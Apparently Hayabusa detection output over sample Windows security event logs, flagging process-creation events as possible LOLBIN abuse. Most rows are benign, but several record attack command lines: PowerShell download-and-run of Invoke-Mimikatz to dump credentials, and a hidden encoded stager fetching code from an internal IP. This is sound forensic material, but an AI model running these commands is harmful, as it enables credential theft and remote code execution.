6272016-08-26 00:03:05.916 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x108 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6282016-08-26 00:03:06.884 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc34 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6292016-08-26 00:03:06.931 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xfcc | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6302016-08-26 00:03:25.697 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6fc | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6312016-08-26 00:04:55.947 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x764 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6322016-08-26 00:04:55.947 +09:00IE10Win74688highResDevRelevant Anti-Virus Eventrules/sigma/builtin/application/win_av_relevant_match.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6332016-08-26 00:23:21.642 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xe54 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6342016-08-26 00:23:21.658 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x500 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6352016-08-26 00:23:21.658 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6362016-08-26 00:25:21.642 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x7d4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6372016-08-26 00:38:00.158 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc60 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6382016-08-26 05:43:45.656 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x318 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6392016-08-26 05:43:48.234 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x488 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6402016-08-26 05:44:06.459 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x64c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6412016-08-26 05:46:45.647 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb5c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6422016-08-26 05:58:45.022 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x780 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6432016-08-26 05:58:46.850 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Users\IEUser\Desktop\launcher.bat" " | Path: C:\Windows\System32\cmd.exe | PID: 0x9c0 | User: IEUser | LID: 0x4d011rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6442016-08-26 05:58:46.881 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc JAB3AEMAPQBOAGUAVwAtAE8AQgBKAGUAYwBUACAAUwB5AHMAVABlAG0ALgBOAEUAdAAuAFcARQBiAEMATABpAEUAbgBUADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7ACQAVwBDAC4ASABFAEEARABlAHIAUwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBDAC4AUAByAG8AWABZACAAPQAgAFsAUwB5AFMAVABlAE0ALgBOAGUAVAAuAFcARQBCAFIARQBxAHUAZQBTAFQAXQA6ADoARABlAEYAYQB1AGwAdABXAGUAQgBQAFIAbwBYAHkAOwAkAHcAQwAuAFAAUgBvAHgAWQAuAEMAUgBlAEQARQBOAHQASQBBAEwAUwAgAD0AIABbAFMAeQBzAFQAZQBtAC4ATgBFAFQALgBDAHIAZQBEAEUAbgBUAGkAQQBsAEMAYQBjAEgARQBdADoAOgBEAGUAZgBhAFUATAB0AE4ARQB0AHcATwByAGsAQwBSAEUARABFAE4AdABpAGEATABzADsAJABLAD0AJwApADAAZABoAEMAeQAxAEoAOQBzADMAcQBZAEAAJQBMACEANwBwAHUAXQBUAHwAdgBWAH0AdABuAFsAQQBRAFIAJwA7ACQAaQA9ADAAOwBbAEMAaABhAFIAWwBdAF0AJABiAD0AKABbAGMASABBAFIAWwBdAF0AKAAkAFcAYwAuAEQATwB3AG4ATABPAEEAZABTAFQAcgBJAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQA5ADgALgAxADQAOQA6ADgAMAA4ADAALwBpAG4AZABlAHgALgBhAHMAcAAiACkAKQApAHwAJQB7ACQAXwAtAEIAWABvAFIAJABLAFsAJABJACsAKwAlACQASwAuAEwARQBuAGcAVABIAF0AfQA7AEkARQBYACAAKAAkAEIALQBqAG8ASQBOACcAJwApAA== | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe0 | User: IEUser | LID: 0x4d011rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6452016-08-26 05:58:46.881 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: cmd /c del "C:\Users\IEUser\Desktop\launcher.bat" | Path: C:\Windows\System32\cmd.exe | PID: 0xa48 | User: IEUser | LID: 0x4d011rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6462016-08-26 06:11:59.064 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\gpedit.msc" | Path: C:\Windows\System32\mmc.exe | PID: 0xf20 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6472016-08-26 07:17:58.251 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x500 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6482016-08-26 07:17:58.259 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xa9c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6492016-08-27 05:34:50.038 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x700 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6502016-08-27 05:34:50.394 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb98 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6512016-08-27 05:34:51.064 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xed8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6522016-08-27 05:34:51.099 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9e4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6532016-08-27 05:36:35.595 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\wuauclt.exe" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x42c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6542016-08-27 05:38:39.078 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa04 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6552016-08-27 05:38:44.366 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeb8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6562016-08-27 05:38:58.135 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfa8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6572016-08-27 05:54:34.003 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xa5c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6582016-08-27 05:54:34.019 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x77c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6592016-08-27 05:54:34.030 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xbd4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6602016-08-27 05:56:33.997 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xcd0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6612016-08-27 09:49:33.186 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb80 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6622016-08-27 09:49:33.198 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6632016-08-28 00:20:56.600 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x550 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6642016-08-28 00:20:56.608 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6652016-08-28 00:20:57.729 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x428 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6662016-08-28 00:20:57.955 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6672016-08-28 00:21:00.750 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb78 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6682016-08-28 00:21:00.752 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x734 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6692016-08-28 00:21:00.760 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xf94 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6702016-08-28 00:22:11.163 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb20 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6712016-08-28 00:22:11.319 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeac | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6722016-08-28 00:31:15.759 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCreds" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: IEUser | LID: 0x4d011rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6732016-08-28 00:31:15.759 +09:00IE10Win74688highResDevRelevant Anti-Virus Eventrules/sigma/builtin/application/win_av_relevant_match.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6742016-08-28 00:31:37.371 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3b4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6752016-08-28 00:31:37.402 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6762016-08-28 00:32:08.574 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCreds" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde8 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6772016-08-28 00:32:08.574 +09:00IE10Win74688highResDevRelevant Anti-Virus Eventrules/sigma/builtin/application/win_av_relevant_match.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6782016-08-28 00:32:35.199 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://eic.me/17'); Invoke-Mimikatz –DumpCreds" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb20 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6792016-08-28 00:32:35.199 +09:00IE10Win74688highResDevRelevant Anti-Virus Eventrules/sigma/builtin/application/win_av_relevant_match.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6802016-08-28 00:34:22.339 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz –DumpCreds" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x500 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6812016-08-28 00:34:22.339 +09:00IE10Win74688highResDevRelevant Anti-Virus Eventrules/sigma/builtin/application/win_av_relevant_match.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6822016-08-28 01:46:13.438 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb74 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6832016-08-28 01:46:13.445 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x648 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6842016-08-28 06:44:54.269 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xcf0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
